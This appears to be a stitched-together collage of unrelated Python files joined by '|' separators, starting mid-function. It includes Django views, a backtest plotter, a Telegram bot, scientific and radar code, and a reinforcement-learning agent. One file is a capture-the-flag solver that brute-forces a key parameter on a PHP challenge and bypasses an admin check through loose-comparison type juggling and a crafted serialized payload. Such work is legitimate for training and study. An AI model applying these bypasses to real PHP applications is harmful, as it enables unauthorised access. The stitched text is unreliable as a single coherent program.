post = get_object_or_404(Post, slug=slug)
if request.user != post.user:
return redirect(reverse('posts:detail', kwargs={'slug': slug}))
form = PostsForm(request.POST or None, request.FILES or None, initial={
"title": post.title,
"content": post.content,
"image": post.image,
"categories": [ category.id for category in post.categories.all() ]
})
if request.method == 'POST' and form.is_valid():
if post.image != form.cleaned_data["image"]:
os.remove(os.path.join(MEDIA_ROOT, f"{post.image}"))
post.title=form.cleaned_data['title']
post.content=form.cleaned_data['content']
post.image=form.cleaned_data['image']
post.user = request.user
post.save()
for id in form.cleaned_data['categories']:
category = get_object_or_404(Category, id=int(id))
post.categories.add(category)
return redirect(reverse('posts:detail', kwargs={"slug":slug}))
context = {
"form": form,
"slug": slug
}
return render(request, 'posts/edit.html', context)
def delete(request, slug):
post = get_object_or_404(Post, slug=slug)
if request.user != post.user:
return redirect(reverse('posts:detail', kwargs={'slug':slug}))
post.delete()
return redirect('posts:home') |
import requests
import hashlib
import re
url = "https://sec-army.ml/fatherphp/fatherphp.php?key1="
s= requests.session()
d = "1"
for d in range(-1000,100):
#print d
r= s.get(url + str(d))
if "secarmy" in r.content:
print r.content
print d
url2 = url + str(d)
# 1e1-2 == 8
r1 = s.get(url2 + "&" + "key2=1e1-2")
print r1.content
# rq md5 = c6d8c86cf807f3f3b38850342d1531b3
md5value = "rq"
h = hashlib.md5(md5value.encode())
fd = h.hexdigest()
url3 = str(url2 + "&" + "rq=rq" + "&" + "key2=1e1-2" + "&" + 'fp='+ fd)
#print url3
r3 = s.get(url3)
#print r3.content
#root@Rootx:~/ctf/ringctf# php -a
#Interactive mode enabled
#php > $n = hash('ripemd160',"'np'");
#php > echo $n;
#6b8e49d76469a9c097976a8940983f8992c8fabc
#php >
ns = "6b8e49d76469a9c097976a8940983f8992c8fabc"
url4 = str(url3 + "&" + 'np=' + ns)
r4 = s.get(url4)
print r4.content
print url4
#$data = unserialize($hell); a:2 is two array value
#if ($data['username'] == $adminName && $data['password'] == $adminPassword) { | s:8 "username" and s:8 "password"
#echo $flag5 . "<br>";
#} else {
# die("useless");
#}
unserialize = "a:2:{s:8:" + '"' + "username" + '"' + ";d:0;s:8:" + '"' + "password" + '"' + ";d:0;}"
url5 = str(url4 + "&" + "key3=" + unserialize)
r5 = s.get(url5)
ft=(r5.content).split('\n')
f=ft[3].split('<br>')
print f[1]+f[3]+f[4]+f[5]
break
|
#!/usr/bin/env python3
# coding: utf-8
""" Functions to plot backtest. """
# Built-in packages
# External packages
import numpy as np
from matplotlib import pyplot as plt
import seaborn as sns
# Internal packages
from fynance.features.money_management import iso_vol
from fynance.features.metrics import drawdown, roll_sharpe
from fynance.backtest.print_stats import set_text_stats
# Set plot style
plt.style.use('seaborn')
__all__ = ['display_perf']
# =========================================================================== #
# Printer Tools #
# =========================================================================== #
def compute_perf(logret, signal, fee):
fees = np.zeros(logret.shape)
fees[1:] = (signal[1:] - signal[:-1]) * fee
pctret = np.exp(logret) - 1 - fees
return np.cumprod(pctret * signal + 1)
def display_perf(
y_idx, y_est, period=252, title='', params_iv={},
plot_drawdown=True, plot_roll_sharpe=True, x_axis=None,
underlying='Underlying', win=252, fees=0,
):
""" Plot performance and print KPI of backtest.
Print dynamic plot of performance indicators (perf, rolling sharpe
and draw down) of a strategy (raw and iso-volatility) versus its
underlying.
Parameters
----------
y_idx : np.ndarray[np.float64, ndim=1]
Time series of log-returns of the underlying.
y_est : np.ndarray[np.float64, ndim=1]
Time series of the signal's strategy.
period : int, optional
Number of period per year. Default is 252.
title : str or list of str, optional
Title of performance strategy, default is empty.
plot_drawdown : bool, optional
If true plot drawdowns, default is True.
plot_roll_sharpe : bool, optional
If true plot rolling sharpe ratios, default is True.
x_axis : list or np.asarray, optional
x-axis to plot (e.g. list of dates).
underlying : str, optional
Name of the underlying, default is 'Underlying'.
win : int, optional
Size of the window of rolling sharpe, default is 252.
fees : float, optional
Fees to apply at the strategy performance.
Returns
-------
perf_idx : np.ndarray[np.float64, ndim=1]
Time series of underlying performance.
perf_est : np.ndarray[np.float64, ndim=1]
Time series of raw strategy performance.
perf_ivo : np.ndarray[np.float64, ndim=1]
Time series of iso-vol strategy performance.
See Also
--------
PlotBackTest, set_text_stats
"""
if x_axis is None:
x_axis = range(y_idx.size)
# Compute perf.
perf_idx = np.exp(np.cumsum(y_idx))
perf_est = compute_perf(y_idx, y_est, fees)
iv = iso_vol(np.exp(np.cumsum(y_idx)), **params_iv)
perf_ivo = compute_perf(y_idx, y_est * iv, fees)
# Print stats. table
txt = set_text_stats(
y_idx, period=period,
Strategy=y_est,
Strat_IsoVol=y_est * iv,
underlying=underlying,
fees=fees
)
print(txt)
# Plot results
n = 1 + plot_roll_sharpe + plot_drawdown
f, ax = plt.subplots(n, 1, figsize=(9, 6), sharex=True)
if n == 1:
ax_perf, ax_dd, ax_dd = ax, None, None
ax_perf.set_xlabel('Date')
elif n == 2:
ax_perf = ax[0]
(ax_dd, ax_roll) = (ax[1], None) if plot_drawdown else (None, ax[1])
ax[-1].set_xlabel('Date')
else:
ax_perf, ax_dd, ax_roll = ax[0], ax[1], ax[2]
# Plot performances
ax_perf.plot(
x_axis,
100 * perf_est,
color=sns.xkcd_rgb["pale red"],
LineWidth=2.
)
ax_perf.plot(
x_axis,
100 * perf_ivo,
color=sns.xkcd_rgb["medium green"],
LineWidth=1.8
)
ax_perf.plot(
x_axis,
100 * perf_idx,
color=sns.xkcd_rgb["denim blue"],
LineWidth=1.5
)
# Set notify motion function
def motion(event):
N = len(ax_perf.lines[0].get_ydata())
w, h = f.get_size_inches() * f.dpi - 200
x = max(event.x - 100, 0)
j = int(x / w * N)
ax_perf.legend([
'Strategy: {:.0f} %'.format(ax_perf.lines[0].get_ydata()[j] - 100),
'Strat Iso-Vol: {:.0f} %'.format(ax_perf.lines[1].get_ydata()[j] - 100),
'{}: {:.0f} %'.format(underlying, ax_perf.lines[2].get_ydata()[j] - 100),
], loc='upper left', frameon=True, fontsize=10)
if plot_drawdown:
ax_dd.legend([
'Strategy: {:.2f} %'.format(ax_dd.lines[0].get_ydata()[j]),
'Strat Iso-Vol: {:.2f} %'.format(ax_dd.lines[1].get_ydata()[j]),
'{}: {:.2f} %'.format(underlying, ax_dd.lines[2].get_ydata()[j]),
], loc='upper left', frameon=True, fontsize=10)
if plot_roll_sharpe:
ax_roll.legend([
'Strategy: {:.2f}'.format(ax_roll.lines[0].get_ydata()[j]),
'Strat Iso-Vol: {:.2f}'.format(ax_roll.lines[1].get_ydata()[j]),
'{}: {:.2f}'.format(underlying, ax_roll.lines[2].get_ydata()[j]),
], loc='upper left', frameon=True, fontsize=10)
ax_perf.legend(
['Strategy', 'Strat Iso-Vol', underlying],
loc='upper left', frameon=True, fontsize=10
)
ax_perf.set_ylabel('Perf.')
ax_perf.set_yscale('log')
ax_perf.set_title(title)
ax_perf.tick_params(axis='x', rotation=30, labelsize=10)
# Plot DrawDowns
if plot_drawdown:
ax_dd.plot(
x_axis,
100 * drawdown(perf_est),
color=sns.xkcd_rgb["pale red"],
LineWidth=1.4
)
ax_dd.plot(
x_axis,
100 * drawdown(perf_ivo),
color=sns.xkcd_rgb["medium green"],
LineWidth=1.2
)
ax_dd.plot(
x_axis,
100 * drawdown(perf_idx),
color=sns.xkcd_rgb["denim blue"],
LineWidth=1.
)
ax_dd.set_ylabel('% DrawDown')
ax_dd.set_title('DrawDown in percentage')
ax_dd.tick_params(axis='x', rotation=30, labelsize=10)
# Plot rolling Sharpe ratio
if plot_roll_sharpe:
ax_roll.plot(
x_axis,
roll_sharpe(perf_est, period=period, w=win),
color=sns.xkcd_rgb["pale red"],
LineWidth=1.4
)
ax_roll.plot(
x_axis,
roll_sharpe(perf_ivo, period=period, w=win),
color=sns.xkcd_rgb["medium green"],
LineWidth=1.2
)
ax_roll.plot(
x_axis,
roll_sharpe(perf_idx, period=period, w=win),
color=sns.xkcd_rgb["denim blue"],
LineWidth=1.
)
ax_roll.set_ylabel('Sharpe ratio')
ax_roll.set_yscale('log')
ax_roll.set_xlabel('Date')
ax_roll.set_title('Rolling Sharpe ratio')
ax_roll.tick_params(axis='x', rotation=30, labelsize=10)
f.canvas.mpl_connect('motion_notify_event', motion)
plt.show()
return perf_idx, perf_est, perf_ivo
|
#!/usr/bin/env python
from SimpleHTTPServer import SimpleHTTPRequestHandler
from BaseHTTPServer import HTTPServer
from urlparse import urlparse, parse_qs
import cgi
PORT=5003
class TracerHandler(SimpleHTTPRequestHandler):
container={'k':0};
def do_GET(self):
#self.send_response(200)
ctype, pdict = cgi.parse_header(self.headers.getheader('content-type'))
if ctype == 'multipart/form-data':
postvars = cgi.parse_multipart(self.rfile, pdict)
elif ctype == 'application/x-www-form-urlencoded':
length = int(self.headers.getheader('content-length'))
postvars = cgi.parse_qs(self.rfile.read(length), keep_blank_values=1)
else:
postvars = {}
if 'trace' in postvars.keys():
self.container['k'] += 1
print str(self.container['k'])+' - '+str(postvars['name'].pop())
print '---------------------'
print '\n'
print postvars['trace'].pop()
print '\n'
print '---------------------'
self.wfile.write('Logger')
return
def do_POST(self):
self.do_GET()
return
#self.send_response(200)
httpd = HTTPServer(("", PORT), TracerHandler)
print "PicPay Tracer", PORT
httpd.serve_forever() |
#!/usr/bin/env python3
def main():
for _ in range(int(input())):
people = []
for _ in range(int(input())):
name, classes, _ = input().split()
classes = [ord(c[0]) for c in classes.split("-")]
people.append((name[:-1], classes[::-1]
+ [109 for _ in range(10 - len(classes))]))
people.sort(key=lambda p: p[0])
people.sort(key=lambda p: p[1], reverse=True)
print("\n".join(map(lambda x: x[0], people)))
print("==============================")
if __name__ == '__main__':
main()
|
import logging
import re
# noinspection PyPackageRequirements
from telegram.ext import (
CommandHandler,
MessageHandler,
ConversationHandler,
Filters
)
from bot import stickersbot
from .packs import create
from .stickers import add
from .conversation_statuses import Status
from .fallback_commands import cancel_command, on_timeout
from .fallback_commands import STANDARD_CANCEL_COMMANDS
from ..customfilters import CustomFilters
logger = logging.getLogger(__name__)
stickersbot.add_handler(ConversationHandler(
name='create_or_add',
persistent=True,
entry_points=[
# CREATE
CommandHandler(['create', 'new'], create.on_create_static_pack_command),
# ADD
CommandHandler(['add', 'a'], add.on_add_command)
],
states={
# CREATE
Status.CREATE_WAITING_TITLE: [
MessageHandler(Filters.text & ~Filters.command(STANDARD_CANCEL_COMMANDS), create.on_pack_title_receive),
MessageHandler(~Filters.text, create.on_waiting_title_invalid_message)
],
Status.CREATE_WAITING_NAME: [
MessageHandler(Filters.text & ~Filters.command(STANDARD_CANCEL_COMMANDS), create.on_pack_name_receive),
MessageHandler(~Filters.text, create.on_waiting_name_invalid_message)
],
Status.CREATE_WAITING_FIRST_STICKER: [
MessageHandler(Filters.text & ~Filters.command, create.on_first_sticker_text_receive), # in case the user sends the emojis
# this handler is shared by both static and animated stickers
MessageHandler(Filters.sticker | CustomFilters.png_file, create.on_first_sticker_receive),
MessageHandler(~Filters.text, create.on_waiting_first_sticker_invalid_message)
],
# ADD
Status.ADD_WAITING_TITLE: [
MessageHandler(~Filters.text, add.on_waiting_title_invalid_message),
MessageHandler(Filters.text & ~Filters.command(STANDARD_CANCEL_COMMANDS), add.on_pack_title)
],
Status.ADD_WAITING_NAME: [
MessageHandler(~Filters.text, add.on_waiting_name_invalid_message),
MessageHandler(Filters.text & ~Filters.command(STANDARD_CANCEL_COMMANDS), add.on_pack_name)
],
# SHARED (ADD)
Status.WAITING_STATIC_STICKERS: [
MessageHandler(Filters.text & ~Filters.command, add.on_text_receive), # in case the user sends the emojis
MessageHandler(CustomFilters.static_sticker_or_png_file, add.on_static_sticker_receive),
MessageHandler(CustomFilters.animated_sticker, add.on_bad_static_sticker_receive),
# for everything that is not catched by the handlers above
MessageHandler(Filters.all & ~Filters.command(STANDARD_CANCEL_COMMANDS), add.on_waiting_sticker_invalid_message)
],
Status.WAITING_ANIMATED_STICKERS: [
MessageHandler(Filters.text & ~Filters.command, add.on_text_receive), # in case the user sends the emojis
MessageHandler(CustomFilters.animated_sticker, add.on_animated_sticker_receive),
MessageHandler(CustomFilters.static_sticker_or_png_file, add.on_bad_animated_sticker_receive),
# for everything that is not catched by the handlers above
MessageHandler(Filters.all & ~Filters.command(STANDARD_CANCEL_COMMANDS), add.on_waiting_sticker_invalid_message)
],
# TIMEOUT
ConversationHandler.TIMEOUT: [MessageHandler(Filters.all, on_timeout)]
},
fallbacks=[CommandHandler(STANDARD_CANCEL_COMMANDS, cancel_command)],
conversation_timeout=15 * 60
)) |
'''VoidFinder - Hoyle & Vogeley (2002)'''
################################################################################
#
# IMPORT MODULES
#
################################################################################
from voidfinder import filter_galaxies, find_voids
from astropy.io import fits
from astropy.table import Table
from absmag_comovingdist_functions import Distance
################################################################################
#
# USER INPUTS
#
################################################################################
survey_name = 'DESI_mock_2_'
# File header
in_directory = ''
out_directory = '/scratch/mguzzett/VoidFinder/'
# Input file names
galaxies_filename = 'DESI_void_mock_2.fits' # File format: RA, dec, redshift, comoving distance, absolute magnitude
mask_filename = 'void_2_mask.dat' # File format: RA, dec
in_filename = in_directory + galaxies_filename
mask_filename = in_directory + mask_filename
# Output file names
out1_filename = out_directory + galaxies_filename[:-5] + '_maximal.txt' # List of maximal spheres of each void region: x, y, z, radius, distance, ra, dec
out2_filename = out_directory + galaxies_filename[:-5] + '_holes.txt' # List of holes for all void regions: x, y, z, radius, flag (to which void it belongs)
#out3_filename = out_directory + 'out3_vollim_dr7.txt' # List of void region sizes: radius, effective radius, evolume, x, y, z, deltap, nfield, vol_maxhole
#voidgals_filename = out_directory + 'vollim_voidgals_dr7.txt' # List of the void galaxies: x, y, z, void region
# Survey parameters
min_dist = 0 # z =
max_dist = 2300. # z = 0.7 --> 2388 Mpc/h
# Cosmology
Omega_M = 0.3
h = 1
################################################################################
#
# OPEN FILES
#
################################################################################
gal_file = fits.open(in_filename)
infile = Table(gal_file[1].data)
maskfile = Table.read(mask_filename, format='ascii.commented_header')
# Rename columns
if 'rabsmag' not in infile.columns:
'''
print(infile.columns)
print('Please rename columns')
exit()
'''
infile['magnitude'].name = 'rabsmag'
# Calculate comoving distance
if 'Rgal' not in infile.columns:
infile['Rgal'] = Distance(infile['z'], Omega_M, h)
################################################################################
#
# FILTER GALAXIES
#
################################################################################
coord_min_table, mask, ngrid = filter_galaxies(infile, maskfile, min_dist, max_dist, survey_name)
################################################################################
#
# FIND VOIDS
#
################################################################################
find_voids(ngrid, min_dist, max_dist, coord_min_table, mask, out1_filename, out2_filename, survey_name)
|
#SudokuPuzzle.py
# Adapted from SudokuData.py
#################
## sudokuPuzzle ##
#################
from select_error import SelectError
from SudokuData import SudokuData
class SudokuPuzzle(SudokuData):
def __init__(self, desc=None, file_name=None, **kwargs):
"""
:description: Description of puzzle
:file_name: file name, if known
"""
self.file_name=file_name
if desc is None:
"Basic Sudoku Puzzle"
super(SudokuPuzzle, self).__init__(**kwargs)
def add_cell(self, row=None, col=None, val=None):
""" Add data square to puzzle
:row: row number
:col: column number
:val: square number
"""
if row is None or col is None or val is None:
raise SelectError(f" row, col and val must be specified row={row}, col={col}, val={val}")
self.setCell(row=row, col=col, val=val)
def file2puzzle(self, file=None):
""" convert file name/object to puzzle
:file: name if string, else open file stream
:returns: puzzle, None if failure
"""
if isinstance(file, str):
self.file_name = file
file = open(file)
puzzle_str = file.splitlines()
puzzle = self.str2puzzle(puzzle_str)
return puzzle
def copy(self):
""" Copy puzzle to insulate changes in data
:Returns: copy of data with new objects for cells
"""
rows = self.nRow
grows = self.nSubRow
cols = self.nCol
gcols = self.nSubCol
cp = SudokuPuzzle(rows=rows, grows=grows,
cols=cols, gcols=gcols)
for nr in range(1, rows+1):
for nc in range(1, cols+1):
val = self.getCellVal(row=nr, col=nc)
if val is not None:
cp.add_cell(row=nr, col=nc, val=val)
return cp
|
import numpy as np
import matplotlib.pyplot as plt
import matplotlib
from pylab import *
from mpl_toolkits.mplot3d import Axes3D
from matplotlib import cm
import math
def laplace_iteration2_t(f,r,U_t,dr,dtheta,n,m):
n=int(n)
m=int(m)
g=np.zeros((n+1,m));
for j in range(1,int(m-1)): #iteration on the angle
## Building the matrix A for a given j=2...m-1
A = np.zeros((n+1,n+1));
for i in range(1,n):
A[i,i-1] = (-1/(2*dr)+r[i,j]/(dr**2));
A[i,i] = -2*(r[i,j]/dr**2 + 1/(r[i,j]*dtheta**2));
A[i,i+1] = 1/(2*dr)+r[i,j]/dr**2;
#A[1,1] = -2*(r[1,j]/dr**2 + 1/(r[1,j]*dtheta**2));
A[0,0] = 1;
A[0,1] = -1;
#A[1,2] = r[1,j]/dr**2 + (r[1,j]-dr)/dr**2;
A[n,n] = 1;
## Building the forcing vector ff
ff=np.zeros((n+1,1));
for i in range(1,n):
ff[i] = -(f[i,j-1]+f[i,j+1])/(r[i,j]*dtheta**2);
ff[n] = r[n,j]*U_t[n,j]; # exact value on the exterior boundary
## Solving for ru_t on the line for a fixed j
g[:,j] = linalg.lstsq(A,ff)[0].reshape(n+1)
## For j=0
A1 = np.zeros((n+1,n+1));
for i in range(1,n):
A1[i,i-1] = (-1/(2*dr)+r[i,0]/(dr**2));
A1[i,i] = -2*(r[i,0]/dr**2 + 1/(r[i,0]*dtheta**2));
A1[i,i+1] = 1/(2*dr)+r[i,0]/dr**2;
#A1[1,1] = -2*(r[1,1]/dr**2 + 1/(r[1,1]*dtheta**2));
#A1[1,2] = r[1,1]/dr**2 + (r[1,1]-dr)/dr**2;
A1[0,0]=1;
A1[0,1]=-1;
A1[n,n] = 1;
## Building the forcing vector ff1
ff1=np.zeros((n+1,1));
for i in range(1,n):
ff1[i] = -(f[i,m-1]+f[i,1])/(r[i,0]*dtheta**2);
ff1[n] = r[n,0]*U_t[n,0]; # exact value on the exterior boundary
## Solving for ru_t on the line for j=0
g[:,0] = linalg.lstsq(A1,ff1)[0].reshape(n+1)
## For j=m
## Building the matrix A for j=m-1
Am = np.zeros((n+1,n+1));
for i in range(1,n):
Am[i,i-1] = (-1/(2*dr)+r[i,m-1]/(dr**2));
Am[i,i] = -2*(r[i,m-1]/dr**2 + 1/(r[i,m-1]*dtheta**2));
Am[i,i+1] = 1/(2*dr)+r[i,m-1]/dr**2;
#An[1,1] = -2*(r(1,n]/dr**2 + 1/(r(1,n]*dtheta**2));
#An(1,2] = r(1,n]/dr**2 + (r(1,n]-dr)/dr**2;
Am[0,0]=1;
Am[0,1]=-1;
Am[n,n] = 1;
## Building the forcing vector ffm-1
ffm=np.zeros((n+1,1));
for i in range(1,n):
ffm[i] = -(f[i,m-2]+f[i,0])/(r[i,m-1]*dtheta**2);
ffm[n] = r[n,m-1]*U_t[n,m-1]; # exact value on the exterior boundary
## Solving for ru_r on the line j=m-1
g[:,m-1] = linalg.lstsq(Am,ffm)[0].reshape(n+1)
return g
|
from data_transfer import DataTransfer
import csv
import psycopg2
def table_list(connect_par):
tbls = []
with psycopg2.connect(connect_par) as con:
with con.cursor() as cur:
# Получаем список таблиц из исходной БД :
cur.execute("""SELECT table_name
FROM information_schema.tables
WHERE table_schema = 'public'""")
for row in cur.fetchall():
tbls.append(row[0])
return tbls
class DataTransferPostgres(DataTransfer):
def __init__(
self, config,
source_pg_conn_str,
pg_conn_str,
pg_meta_conn_str,
query, *args, **kwargs
):
super(DataTransferPostgres, self).__init__(
config=config,
# source_pg_conn_str=source_pg_conn_str,
pg_conn_str=pg_conn_str,
pg_meta_conn_str=pg_meta_conn_str,
query=query, *args, **kwargs
)
self.source_pg_conn_str = source_pg_conn_str
self.query = query
def provide_data(self, csv_file, context):
pg_conn = psycopg2.connect(self.source_pg_conn_str)
pg_cursor = pg_conn.cursor()
query_to_execute = self.query
self.log.info("Executing query: {}".format(query_to_execute))
pg_cursor.execute(query_to_execute)
csvwriter = csv.writer(
csv_file,
delimiter="\t",
quoting=csv.QUOTE_NONE,
lineterminator="\n",
escapechar='\\'
)
while True:
rows = pg_cursor.fetchmany(size=1000)
if rows:
for row in rows:
_row = list(row)
csvwriter.writerow(_row)
else:
break
pg_conn.close()
|
def arrayChange(inputArray):
sum1 = 0
for i in range(len(inputArray)):
temp = list()
if i == 0:
continue
else:
if inputArray[i] > inputArray[i-1]:
continue
else:
temp.append(inputArray[i])
inputArray[i] = inputArray[i-1] +1
sum1 += inputArray[i] - temp[0]
return sum1
arr = [1,1,1]
print(arrayChange(arr))
|
"""
Project: RadarBook
File: non_coherent_integration.py
Created by: Lee A. Harrison
One: 10/9/2018
Created with: PyCharm
Copyright (C) 2019 Artech House (artech@artechhouse.com)
This file is part of Introduction to Radar Using Python and MATLAB
and can not be copied and/or distributed without the express permission of Artech House.
"""
import sys
from numpy import exp, sqrt, finfo
from scipy.special import gammainc, gammaincinv, iv, binom
from Libs.detection.single_pulse import Q
def single_pulse_snr(pd, pfa, number_of_pulses, swerling_type):
"""
Compute the required signal to noise ratio given a probability of detection and probability of false alarm.
:param pd: The probability of detection.
:param pfa: The probability of false alarm.
:param number_of_pulses: The number of pulses to be integrated.
:param swerling_type: The Swerling model type.
:return: The required signal to noise ratio.
"""
signal_to_noise = 1.0
delta = 1000.0
while True:
if pd > probability_of_detection(signal_to_noise, pfa, number_of_pulses, swerling_type):
signal_to_noise += delta
else:
signal_to_noise -= delta
if signal_to_noise < 0.0:
signal_to_noise = 1e-6
delta *= 0.5
if abs(pd - probability_of_detection(signal_to_noise, pfa, number_of_pulses, swerling_type)) < 1e-6:
break
return signal_to_noise
def threshold_to_noise_ratio(probability_of_false_alarm, number_of_pulses):
"""
Calculate the threshold to noise ratio.
:param probability_of_false_alarm: The probability of false alarm.
:param number_of_pulses: The number of pulses to be non-coherently integrated.
:return: The threshold to noise ratio.
"""
return gammaincinv(number_of_pulses, 1.0 - probability_of_false_alarm)
def probability_of_detection(signal_to_noise, probability_of_false_alarm, number_of_pulses, target_type):
"""
Calculate the probability of detection for Swerling 0 targets.
:param signal_to_noise: The signal to noise ratio.
:param probability_of_false_alarm: The probability of false alarm.
:param number_of_pulses: The number of pulses to be non-coherently integrated.
:param target_type: The Swerling target type (0, 1, 2, 3, or 4).
:return: The probability of detection.
"""
# Calculate the threshold to noise
threshold_to_noise = threshold_to_noise_ratio(probability_of_false_alarm, number_of_pulses)
if target_type == 'Swerling 0':
s = 0
for n in range(2, number_of_pulses + 1):
s += (threshold_to_noise / (number_of_pulses * signal_to_noise)) ** (0.5 * (n - 1.0)) \
* iv(n-1, 2.0 * sqrt(number_of_pulses * signal_to_noise * threshold_to_noise))
if s == float('inf'):
s = sys.float_info.max
return Q(sqrt(2.0 * number_of_pulses * signal_to_noise), sqrt(2.0 * threshold_to_noise), 1e-6) \
+ exp(-threshold_to_noise - number_of_pulses * signal_to_noise) * s
elif target_type == 'Swerling 1':
return 1.0 - gammainc(number_of_pulses - 1 + finfo(float).eps, threshold_to_noise) \
+ (1.0 + 1.0 / (number_of_pulses * signal_to_noise)) ** (number_of_pulses - 1) \
* gammainc(number_of_pulses - 1 + finfo(float).eps, threshold_to_noise / (1.0 + 1.0 / (number_of_pulses * signal_to_noise))) \
* exp(-threshold_to_noise / (1.0 + number_of_pulses * signal_to_noise))
elif target_type == 'Swerling 2':
return 1.0 - gammainc(number_of_pulses, threshold_to_noise / (1.0 + signal_to_noise))
elif target_type == 'Swerling 3':
return (1.0 + 2.0 / (number_of_pulses * signal_to_noise)) ** (number_of_pulses - 2) * \
(1.0 + threshold_to_noise / (1.0 + 0.5 * number_of_pulses * signal_to_noise)
- 2.0 * (number_of_pulses - 2.0) / (number_of_pulses * signal_to_noise)) \
* exp(-threshold_to_noise / (1.0 + 0.5 * number_of_pulses * signal_to_noise))
elif target_type == 'Swerling 4':
s = 0
for k in range(number_of_pulses + 1):
s += binom(number_of_pulses, k) * (0.5 * signal_to_noise) ** -k \
* gammainc(2 * number_of_pulses - k, 2 * threshold_to_noise / (signal_to_noise + 2.0))
if s == float('inf'):
s = sys.float_info.max
return 1.0 - (signal_to_noise / (signal_to_noise + 2.0)) ** number_of_pulses * s
|
from numpy import *
drum = {}
drum[0] = '36' #bass drum
drum[1] = '41' #toms
drum[2] = '38' #snares
drum[3] = '49' #cymbals
drum[4] = '42' #Hi-Hat
threshhold = [0.4,0.05,0.25,0.11,0.4]
with open('output.txt') as f:
content = f.readlines()
delimiter = 120
time = 0
random.seed(42)
wr = open('result.txt','w')
for line in content:
i = line.split()
for idx in range(len(i)):
ok = False
if(float(i[idx]) >= threshhold[idx]):
wr.write("2, " + str(time) + ", Note_on_c, 9, " + drum[idx] + ", 95\n")
ok = True
if ok:
wr.write("2, " + str(time+delimiter) + ", Note_off_c, 9, 0, 0\n")
time = time + delimiter
wr.write("2, " + str(time) + ", End_track\n")
wr.close()
|
"""
날짜 : 2020/08/11
이름 : 이성진
내용 : 선형회귀 분석 실습하기
"""
a = 0.9767441021911394
b = -102.209288612913
x_data = [170, 155, 150, 175, 165, 180, 182, 173, 190, 188]
#분석모델 정의
def model(x):
y = a * x + b
return y
for x in x_data:
print('%d에 대한 예측값 : %d' % (x, model(x))) |
# 练习一下PPO立杆子,用pytorch重写的,但是train不动...
import tensorflow as tf
import numpy as np
import matplotlib.pyplot as plt
import gym
# 超参数
A_LR = 0.0001
C_LR = 0.0002
A_UPDATE_STEPS = 10 # 每次sample完一个minibatch更新多少次actor
C_UPDATE_STEPS = 10 # 每次sample完一个minibatch更新多少次critic
S_DIM, A_DIM = 3, 1 # S: cos(theta), sin(theta), theta_dot角速度
EPSILON = 0.2 # clip的范围
class PPO(object): # 继承object有更多魔法方法
def __init__(self):
self.sess = tf.Session()
self.tfs = tf.placeholder(tf.float32, [None, S_DIM], 'state')
# critic网络,吃state(算V(s)),discounted_r(主程序里操作), 吐advantage,advantage平方变成closs
with tf.variable_scope('critic'):
l1 = tf.layers.dense(self.tfs, 100, tf.nn.relu)
self.v = tf.layers.dense(l1, 1) # 算V(s)
self.tfdc_r = tf.placeholder(tf.float32, [None, 1], 'discounted_r')
self.advantage = self.tfdc_r - self.v
self.closs = tf.reduce_mean(tf.square(self.advantage)) # critic的loss: advantage的平方
# critic要最小化advantage,要让估计的V更接近discounted_r
self.ctrain_op = tf.train.AdamOptimizer(C_LR).minimize(self.closs)
# actor
pi, pi_params = self._build_anet('pi', trainable=True) # 实时更新
# pi 和 oldpi是两个distribution, 两个网络的参数拿出来是为了赋值更新
oldpi, oldpi_params = self._build_anet('oldpi', trainable=False) # 老pi不更新fix住直接赋值
with tf.variable_scope('sample_action'): # 选动作,带噪声的
self.sample_op = tf.squeeze(pi.sample(1), axis=0) # 这边改成了老pi作sample,测试一下performance,但是改成老pi环境会产生nan,很烦
# pi是个distribution, pi.sample(1)是个tensor, 要用sess.run()才会变成numpy
with tf.variable_scope('update_oldpi'): # 老pi赋值
self.update_oldpi_op = [oldp.assign(p) for p, oldp in zip(pi_params, oldpi_params)]
self.tfa = tf.placeholder(tf.float32, [None, A_DIM], 'action') # 选出来的带噪声的动作
self.tfadv = tf.placeholder(tf.float32, [None, 1], 'advantage')
with tf.variable_scope('loss'):
with tf.variable_scope('surrogate'): # 先算一个没clip的loss
ratio = pi.prob(self.tfa) / (oldpi.prob(self.tfa + 1e-5))
surr = ratio * self.tfadv
self.aloss = -(tf.reduce_mean(tf.minimum(
surr, tf.clip_by_value(ratio, 1 - EPSILON, 1 + EPSILON)*self.tfadv
)))
with tf.variable_scope('atrain'):
self.atrain_op = tf.train.AdamOptimizer(A_LR).minimize(self.aloss)
self.sess.run(tf.global_variables_initializer()) # 初始化启动
self.saver = tf.train.Saver() # 这句话要放最后
def _build_anet(self, name, trainable): # 创建actor网络
with tf.variable_scope(name):
l1 = tf.layers.dense(self.tfs, 100, tf.nn.relu, trainable=trainable)
mu = 2 * tf.layers.dense(l1, A_DIM, tf.nn.tanh, trainable=trainable)
# 2 * 是动作上下限 a_bound
sigma = tf.layers.dense(l1, A_DIM, tf.nn.softplus, trainable=trainable) # softplus是平滑版的relu
norm_dist = tf.distributions.Normal(loc=mu, scale=sigma) # 增加exploration
params = tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES, scope=name)
return norm_dist, params
def update(self, s, a, r): # 送进来的一竖条32个minibatch, r是discounted的reward
self.sess.run(self.update_oldpi_op) # 老的pi总是落后于pi
adv = self.sess.run(self.advantage, {self.tfs: s, self.tfdc_r: r})
# 更新网络参数
[self.sess.run(self.atrain_op, {self.tfs: s, self.tfa: a, self.tfadv: adv})for _ in range(A_UPDATE_STEPS)]
# s用来算pi的distribution, a用来算ratio, adv用来算aloss
[self.sess.run(self.ctrain_op, {self.tfs: s, self.tfdc_r: r})for _ in range(C_UPDATE_STEPS)]
# s用来算V(s),和tfdc_r作差算closs
def choose_action(self, s):
s = s[np.newaxis, : ]
a = self.sess.run(self.sample_op, {self.tfs: s})[0]
# 经过tf.Session.run()的tensor输出都会是numpy
return np.clip(a, -2, 2) # 限幅,立杆子的力(-2, 2)
def get_v(self, s): # 吃状态s吐V(s)
if s.ndim < 2: s = s[np.newaxis, : ] # 防止长度为1的s掉成0维
return self.sess.run(self.v, {self.tfs: s})[0, 0]
def save_model(self, path):
self.saver.save(self.sess, save_path = path)
print('模型保存成功!')
def load_model(self, path):
self.saver.restore(self.sess, save_path = path)
print('模型加载成功!')
|
from django.db import models
from user.models import User
from .constants import COMPANY_TYPES, IntegerRangeField
# Create your models here.
class Company(models.Model):
name = models.CharField(max_length=100, verbose_name='Company Name :')
type = models.CharField(max_length=50, verbose_name='Company Type :',
choices=COMPANY_TYPES)
address = models.CharField(max_length=300, verbose_name='Company Address :')
email = models.EmailField(verbose_name='Company contact E-mail :')
phone = models.CharField(default='+880', verbose_name='Phone Number :', max_length=15)
overview = models.CharField(max_length=500, verbose_name='Overview :')
established = models.DateField(verbose_name='Established on :')
